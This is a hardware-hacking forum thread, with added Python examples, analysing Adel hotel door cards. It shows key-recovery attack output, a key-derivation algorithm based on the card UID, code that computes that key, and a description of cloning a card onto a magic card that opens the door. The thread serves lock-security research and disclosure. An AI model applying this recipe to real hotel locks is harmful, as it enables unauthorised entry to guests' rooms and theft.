Proxmark3 community

Research, development and trades concerning the powerful Proxmark3 device.


#1 2017-12-08 11:38:02

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Hotel system Adel - dump

The Adel card is a clone which always NACKs, making darkside take a bit longer. Not needed since it's a default key, which would be picked up with checkkeys.

Uses a very strange SAK, 0x19.

Many default keys. Sector 1 and 15, key A and B == 127567df7ba4 --> 12 UID A4


pm3 --> hf 14a info
 UID : 75 67 DF 7B           
ATQA : 00 04          
 SAK : 19 [2]          
proprietary non iso14443-4 card found, RATS not supported          
Answers to magic commands: NO          
Prng detection: WEAK          

pm3 --> hf mf nack
.          
Always leak NACK detected         
pm3 --> hf mf mif
----------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press pm3-button on the proxmark3 device to abort both proxmark3 and client.
----------------------------------------------------------------------------
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
.....
Found 72 candidate keys. Trying to verify with authentication...
          
Test authentication failed. Restarting darkside attack          
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
..
Found 13 candidate keys. Trying to verify with authentication...
          
Test authentication failed. Restarting darkside attack          
.
Parity is all zero. Most likely this card sends NACK on every authentication.          
Attack will take a few seconds longer because we need two consecutive successful runs.          
..
Found a candidate key. Trying to verify it with authentication...
          
Found valid key: a0a1a2a3a4a5
pm3 --> hf mf nested 1 0 a a0a1a2a3a4a5
Testing known keys. Sector count=16          
Time to check 18 known keys: 7 seconds
          
enter nested...          
UID: 7567df7b target block:  0 key type: B  -- Found key [d0d1d2d3d4d5]          
UID: 7567df7b target block:  4 key type: A  -- Found key [127567df7ba4]          
UID: 7567df7b target block:  4 key type: B          
UID: 7567df7b target block: 60 key type: A  -- Found key [127567df7ba4]          
UID: 7567df7b target block: 60 key type: B  -- Found key [127567df7ba4]          
UID: 7567df7b target block:  4 key type: B  -- Found key [127567df7ba4]          
Time in nested: 12 seconds
          
trying to read key B...          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  a0a1a2a3a4a5  | 1 |  d0d1d2d3d4d5  | 1 |          
|001|  127567df7ba4  | 1 |  127567df7ba4  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  127567df7ba4  | 1 |  127567df7ba4  | 1 |          
|---|----------------|---|----------------|---|     

Offline

#2 2017-12-08 11:42:57

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump


Offline

#3 2017-12-08 12:43:53

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump

simple keygen algo:

key[0] = uid[0] ^ uid[1] 
key[1-4] = uid[0-3]
key[5]  =  checksum ( key[0]^key[1]^key[2]^key[3]^key[4] )

Offline
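
The key layout from the post above, turned into a check that can be run over a recovered key table to see which sector keys carry any secret at all (an added example, not code from the thread or from Proxmark3). It assumes the post's "checksum" is the plain XOR of key[0..4], which reproduces the key shown for UID 7567df7b; the class names and the `KNOWN_DEFAULTS` set are choices made for this example.

```python
# Added example: audit a MIFARE Classic key table for keys that hold no secret.
# Assumption: the "checksum" in the post is the plain XOR of key[0..4]; that
# reading reproduces the key 127567df7ba4 listed for UID 7567df7b in the thread.
from functools import reduce

# Keys treated as publicly known here: factory default and the NXP MAD read key.
KNOWN_DEFAULTS = {"ffffffffffff", "a0a1a2a3a4a5"}

def uid_derived_key(uid: bytes) -> bytes:
    """Build the 6-byte key from a 4-byte UID using the layout in the post."""
    if len(uid) != 4:
        raise ValueError("the scheme is only described for 4-byte UIDs")
    body = bytes([uid[0] ^ uid[1]]) + uid            # key[0], key[1..4]
    return body + bytes([reduce(lambda a, b: a ^ b, body)])  # key[5]

def classify(uid: bytes, key_hex: str) -> str:
    """Label one key: known-default, uid-derived, or unclassified."""
    key = key_hex.lower()
    if key in KNOWN_DEFAULTS:
        return "known-default"
    if bytes.fromhex(key) == uid_derived_key(uid):
        return "uid-derived"
    return "unclassified"

def audit(uid: bytes, table: dict) -> dict:
    """Map sector number -> (class of key A, class of key B)."""
    return {s: (classify(uid, a), classify(uid, b)) for s, (a, b) in table.items()}

# Key table as printed in the first post (sectors 2-14 are all ffffffffffff).
UID = bytes.fromhex("7567df7b")
TABLE = {0: ("a0a1a2a3a4a5", "d0d1d2d3d4d5"),
         1: ("127567df7ba4", "127567df7ba4"),
         **{s: ("ffffffffffff", "ffffffffffff") for s in range(2, 15)},
         15: ("127567df7ba4", "127567df7ba4")}

if __name__ == "__main__":
    for sector, (cls_a, cls_b) in audit(UID, TABLE).items():
        print(f"sector {sector:2d}: A={cls_a:<13} B={cls_b}")
```

Because key[0..2] XOR to zero, key[5] reduces to uid[2] ^ uid[3], so every byte of the key is a function of the UID the card announces during anticollision.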

#4 2018-07-19 15:49:04

henc
Contributor
Registered: 2017-05-13
Posts: 11

Re: Hotel system Adel - dump

Hey Iceman, did these have sector 16 - 31 locked down as well? Think I have a couple samples from the same system as you, the XOR algo on mine matches yours. I have one sample that's been coded in the system with a biometrics application and one that should be straight out of the box from the supplier without additional coding from the hotel's desktop encoder. Both have S16 - 31 A/B locked and I don't think those sectors follow the S1/15 keys you cracked.

SAK 0x19 seemed strange to me as well (it's how I stumbled on this thread) - assumed this chip was Mifare Plus 2k 4 byte UID in SL1 but I expected SAK to be 0x18 then.

Offline

#5 2018-07-19 20:40:02

iceman
Administrator
Registered: 2013-04-25
Posts: 9,495
Website

Re: Hotel system Adel - dump

Dunno if s16-31 matches. I didn't have access to a 4k card from Adel. Collect and gather enough samples so you can get some analysing done.

Offline

#6 2019-07-19 21:02:19

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

iceman wrote:

Dunno if s16-31 matches. I didn't have access to a 4k card from Adel. Collect and gather enough samples so you can get some analysing done.

I successfully cloned an ADEL card to a UID (Chinese magic gen1, 1k) card.

The ADEL card just uses a strange SAK=19 to confuse regular hobbyists. It is just a regular M1 S50 1k with the SAK altered. There are no locked sectors 16 - 31. And it doesn't require anything but sectors 1 and 15 to open the door, like most door access systems (at least in my version).

To clone it, I managed to source a "perfect" UID card that loyally reads the SAK bytes in block 0 and responds to the reader with that SAK.

This card is quite rare since most UID/magic cards just respond SAK 08, for simplicity I guess? Just found 4 out of 60 cards....
(was 4 out of 33, and I thought as my vendor search expanded there would be more "perfect" cards emerging, but it didn't turn out that way.)

Last edited by hfmfsniff (2019-07-19 21:06:36)

Offline

#7 2019-07-19 21:16:53

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

iceman wrote:
sector 0:
blk1: 0000 6c51 0000 0000 0000 0000 0000 00aa
blk2: 0000 0000 0000 0000 0000 0000 0000 6851
....

Sector 0 of ADEL card is usually filled with (often with consecutive repetition) 6C51, 6B51, 6851, 6A51. Does that make any sense to you?

Here is my sample.

blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 6B51 6B51 6B51 6B51 6B51 6B51 6851 6A51

This pattern is highly conserved across 3 cards that open the same door. What is funny is that only the last "6A51" in blk2 is useful. It can be modified to the following and still open the door:

blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 0000 0000 0000 0000 0000 0000 0000 6A51

This pattern aligns with your pattern very well.

Last edited by hfmfsniff (2019-07-19 21:20:12)

Offline

#8 2019-07-20 10:06:43

piwi
Contributor
Registered: 2013-06-04
Posts: 704

Re: Hotel system Adel - dump

Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can look up the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.

Offline

#9 2019-08-04 03:57:55

hfmfsniff
Contributor
Registered: 2019-07-07
Posts: 19

Re: Hotel system Adel - dump

piwi wrote:

Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can look up the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.

Very useful information. However, I think ADEL doesn't check CRC bits validity (block1, second byte) at all. The cards still open the door after modification of AIDs.

Offline
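
The directory layout and checksum discussed in the last two posts, as an added example (not code from any poster or from Proxmark3): it parses sector 0 blocks 1 and 2 as a version 1 MAD and recomputes the CRC a reader could enforce. It assumes the layout and CRC parameters of NXP application note AN10787 (byte 0 = CRC, byte 1 = info byte, CRC-8 with polynomial 0x1D and preset 0xC7); the function names are chosen for this example, and the two blocks are the ones quoted in post #7.

```python
# Added example (not from the thread): MAD v1 parsing and CRC verification.
# Assumes the NXP AN10787 layout: byte 0 = CRC, byte 1 = info byte, then one
# 2-byte AID per sector 1..15; CRC-8 with polynomial 0x1D and preset 0xC7.

def crc8_mad(data: bytes) -> int:
    """Bitwise CRC-8 with the MAD parameters (MSB first, no final XOR)."""
    crc = 0xC7
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1D) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc

def parse_mad1(blk1: bytes, blk2: bytes) -> dict:
    """Split the directory into per-sector AIDs and check the stored CRC."""
    if len(blk1) != 16 or len(blk2) != 16:
        raise ValueError("MAD v1 is exactly two 16-byte blocks")
    mad = blk1 + blk2
    # The AID for sector n is stored at byte offset 2*n, kept here as raw hex.
    aids = {n: mad[2 * n:2 * n + 2].hex() for n in range(1, 16)}
    computed = crc8_mad(mad[1:])  # CRC covers bytes 1..31
    return {
        "stored_crc": mad[0],
        "computed_crc": computed,
        "crc_ok": mad[0] == computed,
        "info_byte": mad[1],
        "used_sectors": {n: a for n, a in aids.items() if a != "0000"},  # 0000 = free
    }

def with_valid_crc(blk1: bytes, blk2: bytes) -> tuple:
    """Return the same directory with byte 0 recomputed over bytes 1..31."""
    return bytes([crc8_mad(blk1[1:] + blk2)]) + blk1[1:], blk2

# Blocks 1 and 2 of sector 0 as quoted in post #7.
BLK1 = bytes.fromhex("00006c510000000000000000000000aa")
BLK2 = bytes.fromhex("00000000000000000000000000006851")

if __name__ == "__main__":
    mad = parse_mad1(BLK1, BLK2)
    print("sectors with an AID:", mad["used_sectors"])
    print(f"stored CRC {mad['stored_crc']:02x}, computed {mad['computed_crc']:02x}, "
          f"valid: {mad['crc_ok']}")
```

A reader that enforces `crc_ok` rejects a directory whose AIDs were edited without recomputing byte 0; the only non-free entries in the quoted blocks are sectors 1, 7 and 15.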
